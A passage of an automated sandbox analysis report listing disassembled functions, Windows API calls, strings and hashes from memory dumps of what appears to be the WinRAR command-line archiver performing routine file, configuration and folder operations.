                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastWrite$Handle
                                                            • String ID:
                                                            • API String ID: 3350704910-0
                                                            • Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                            • Instruction ID: aceb63b23cea0b3a2378316d3a96d63ee348c74f5bfa895d6c896433274085d2
                                                            • Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                            • Instruction Fuzzy Hash: CF519636A0CE5187EA24EF25E46437AE360FF45BA4F840135DB5E47A60EF3CE549CA60
                                                            Function 00007FF71D2D1E80 Relevance: 7.6, APIs: 5, Instructions: 127filetimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1894 7ff71d2d1e80-7ff71d2d1ebb call 7ff71d30a5a0 1897 7ff71d2d1ebd-7ff71d2d1ec1 1894->1897 1898 7ff71d2d1ec8 1894->1898 1897->1898 1899 7ff71d2d1ec3-7ff71d2d1ec6 1897->1899 1900 7ff71d2d1ecb-7ff71d2d1f57 CreateFileW 1898->1900 1899->1900 1901 7ff71d2d1fcd-7ff71d2d1fd1 1900->1901 1902 7ff71d2d1f59-7ff71d2d1f76 GetLastError call 7ff71d2e4534 1900->1902 1904 7ff71d2d1fd3-7ff71d2d1fd7 1901->1904 1905 7ff71d2d1ff7-7ff71d2d200f 1901->1905 1910 7ff71d2d1f78-7ff71d2d1fb6 CreateFileW GetLastError 1902->1910 1911 7ff71d2d1fba 1902->1911 1904->1905 1907 7ff71d2d1fd9-7ff71d2d1ff1 SetFileTime 1904->1907 1908 7ff71d2d2011-7ff71d2d2022 call 7ff71d2fa9e8 1905->1908 1909 7ff71d2d2027-7ff71d2d204b call 7ff71d30a610 1905->1909 1907->1905 1908->1909 1910->1901 1915 7ff71d2d1fb8 1910->1915 1916 7ff71d2d1fbf-7ff71d2d1fc1 1911->1916 1915->1916 1916->1901 1917 7ff71d2d1fc3 1916->1917 1917->1901
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$Time
                                                            • String ID:
                                                            • API String ID: 1999340476-0
                                                            • Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                            • Instruction ID: 59e2628b04a0587b1aa267041c1eb1adec6c5040504bdb9bacc65310ecb89714
                                                            • Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                            • Instruction Fuzzy Hash: AE412673A1CA8146FB619B24E5147AAE691A745BB8F940338DE7D03AC4EF7CC44D8F10
                                                            Function 00007FF71D2C6AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: swprintf
                                                            • String ID: rar.ini$switches=$switches_%ls=
                                                            • API String ID: 233258989-2235180025
                                                            • Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                            • Instruction ID: ba54b0a45aad077b567b162562e51e33570a80f3449b85d36f7c9dd73e375bab
                                                            • Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                            • Instruction Fuzzy Hash: CE419222A1CA8285EA24FB25D4101F9A3A0FB447B4FC40535EA6D076E5FF7CE959CB20
                                                            Function 00007FF71D2E7E20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
                                                            • String ID: rar.lng
                                                            • API String ID: 553376247-2410228151
                                                            • Opcode ID: 0cdb54aa40ba2ca26f1ddd7e9615ca47f74f76cd710d464ec92b81866409da64
                                                            • Instruction ID: ae349736be65872cbae204d877d0695e5db00e5d02710ed45664ef73edded73f
                                                            • Opcode Fuzzy Hash: 0cdb54aa40ba2ca26f1ddd7e9615ca47f74f76cd710d464ec92b81866409da64
                                                            • Instruction Fuzzy Hash: 1C419031E1CE8281FA10BB20A8111FAE7A19F45774FD80538D92D172D6FE2DA80E8F70
                                                            Function 00007FF71D2E40A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • SHGetMalloc.SHELL32(?,00000800,?,00007FF71D2E4432,?,?,?,?,00000800,00000000,00000000,00007FF71D2E38CB,?,?,?,00007FF71D2E41EC), ref: 00007FF71D2E40C4
                                                            • SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF71D2E38CB,?,?,?,00007FF71D2E41EC), ref: 00007FF71D2E40DF
                                                            • SHGetPathFromIDListW.SHELL32 ref: 00007FF71D2E40F1
                                                              • Part of subcall function 00007FF71D2D3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF71D2E413F,?,?,?,?,00000800,00000000,00000000,00007FF71D2E38CB,?,?,?,00007FF71D2E41EC), ref: 00007FF71D2D34A0
                                                              • Part of subcall function 00007FF71D2D3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF71D2E413F,?,?,?,?,00000800,00000000,00000000,00007FF71D2E38CB,?,?,?,00007FF71D2E41EC), ref: 00007FF71D2D34D5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
                                                            • String ID: WinRAR
                                                            • API String ID: 977838571-3970807970
                                                            • Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                            • Instruction ID: 5cd8b26f93c9e0ced65172830cddeddee5e49cf1e4fa875e1d07ca3b5bcd49d3
                                                            • Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                            • Instruction Fuzzy Hash: 63215126A0CF4280EA50AF22F9502BAD361AF89BE1B985035DF5E57755FE3CD4498B10
                                                            Function 00007FF71D31978C Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF71D313CEF,?,?,00000000,00007FF71D313CAA,?,?,00000000,00007FF71D313FD9), ref: 00007FF71D3197A5
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF71D313CEF,?,?,00000000,00007FF71D313CAA,?,?,00000000,00007FF71D313FD9), ref: 00007FF71D319807
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF71D313CEF,?,?,00000000,00007FF71D313CAA,?,?,00000000,00007FF71D313FD9), ref: 00007FF71D319841
                                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF71D313CEF,?,?,00000000,00007FF71D313CAA,?,?,00000000,00007FF71D313FD9), ref: 00007FF71D31986B
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                            • String ID:
                                                            • API String ID: 1557788787-0
                                                            • Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                            • Instruction ID: a12856e8b8df37c0e9296dc45122ea0f9d47de742e5bff4130288fa7dde4c90a
                                                            • Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                            • Instruction Fuzzy Hash: 34216831E1CB52C1E6609F126440129E6A5FF44FE0F884139DE5D67B94EF3CD4598B64
                                                            Function 00007FF71D2D1C74 Relevance: 6.1, APIs: 4, Instructions: 55fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$FileHandleRead
                                                            • String ID:
                                                            • API String ID: 2244327787-0
                                                            • Opcode ID: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
                                                            • Instruction ID: 249cfdc8e7171d4cc6213c13df15b2a1c98306aa7b16eec61a683c170f1df1e1
                                                            • Opcode Fuzzy Hash: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
                                                            • Instruction Fuzzy Hash: 6921A432E0CD4681EA61AB11E010339E2A1BF45BB4FB04235DA7947AC5EF3DD48C8E31
                                                            Function 00007FF71D2C49F8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: AFUM$default.sfx
                                                            • API String ID: 0-2491287583
                                                            • Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                            • Instruction ID: 528a53e84ad18d186db8caed8db04d64580e74db1f0b8bfa87c2de7208c9a4af
                                                            • Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                            • Instruction Fuzzy Hash: 9D81A721E1CE8240EA60BB1191502BAA3A0AF557A4FC44031DEAD076D5FF6DB98BCB70
                                                            Function 00007FF71D3165BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: FileHandleType
                                                            • String ID: @
                                                            • API String ID: 3000768030-2766056989
                                                            • Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                            • Instruction ID: 8f94d3daa5a8e76732e800ec03e7919bb9ea36155f9d0f98dff3c89dbdea533e
                                                            • Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                            • Instruction Fuzzy Hash: A021D432E1CF43C1EB609B259890039EA55EB45774F68133DDA6E067D4EE3CE889E710
                                                            Function 00007FF71D2FB9BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                            • String ID: CreateThread failed
                                                            • API String ID: 1217111108-3849766595
                                                            • Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                            • Instruction ID: b2b16bfd6593cf7b9c6370f62c08ac22970873fbc8274f94ba497c75bed2c610
                                                            • Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                            • Instruction Fuzzy Hash: AD115E3290CE42D2E604FB11E8411AAF360FB847A4F944435DA9D03659FF3CE94ACB10
                                                            Function 00007FF71D2FBB80 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterEventLeave
                                                            • String ID:
                                                            • API String ID: 3094578987-0
                                                            • Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                            • Instruction ID: beea13c800db099ea85de313cc2aaf32c1680b7a052aad403b756bade8f1227a
                                                            • Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                            • Instruction Fuzzy Hash: 1BF06226A0CF4682DA20AF11E5400B9E371FF89BE9F840131DE9D06669EE2CD94D8F10
                                                            Function 00007FF71D2C7B44 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ConsoleFileHandleModeType
                                                            • String ID:
                                                            • API String ID: 4141822043-0
                                                            • Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                            • Instruction ID: 1a9df39a601b171961223706ea15a7a02e6d024eaf90c49da6f9e299deea39ac
                                                            • Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                            • Instruction Fuzzy Hash: 84E0EC24E1DE0282EE686761A865179D252AF59BA1F941038DA1F8A750FE3CD98D8B20
                                                            Function 00007FF71D312488 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                            Download Yara Rule
